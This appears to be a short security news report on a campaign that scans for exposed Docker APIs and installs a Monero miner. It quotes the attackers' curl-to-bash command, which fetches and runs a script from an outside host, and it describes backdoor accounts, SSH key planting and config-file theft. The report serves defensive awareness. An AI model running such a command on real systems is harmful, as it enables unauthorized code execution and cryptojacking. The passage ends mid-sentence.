A currently unidentified group is mass-scanning the internet attempting to discover Linux servers running Docker platforms that have their API endpoints exposed. The group is using the vulnerable endpoints to mine Monero digital currency. They are currently scanning more than 59,000 netblocks attempting to discover exposed Docker instances. Once a vulnerable instance has been identified, the group runs the command chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash; which downloads and runs a Bash script from the attacker’s server. The script then installs an XMRRig crypto-currency miner. In the two days that the campaign has been active, it appears that the hackers have already mined 14.82 Monero coins (XMR), which is approximately $740 USD. The group uninstalls known monitoring agents on the exposed Docker instances and kills a number of other processes. This includes shutting down not only security products but also processes associated with rival mining botnets. The script being run by the group also scans the infected host for Config files, which it then both encrypts and steals, installs backdoor accounts and leaves behind SSH keys for easier access to the infected host by the attackers.
Binary Defense was contacted by an individual who was recently scammed out of $4,000 through